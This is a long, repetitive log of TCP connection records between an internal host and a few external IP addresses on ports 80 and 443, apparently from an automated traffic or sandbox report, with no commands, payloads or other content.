Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 163.172.115.127:80 -> 192.168.2.22:49171
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 163.172.115.127:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
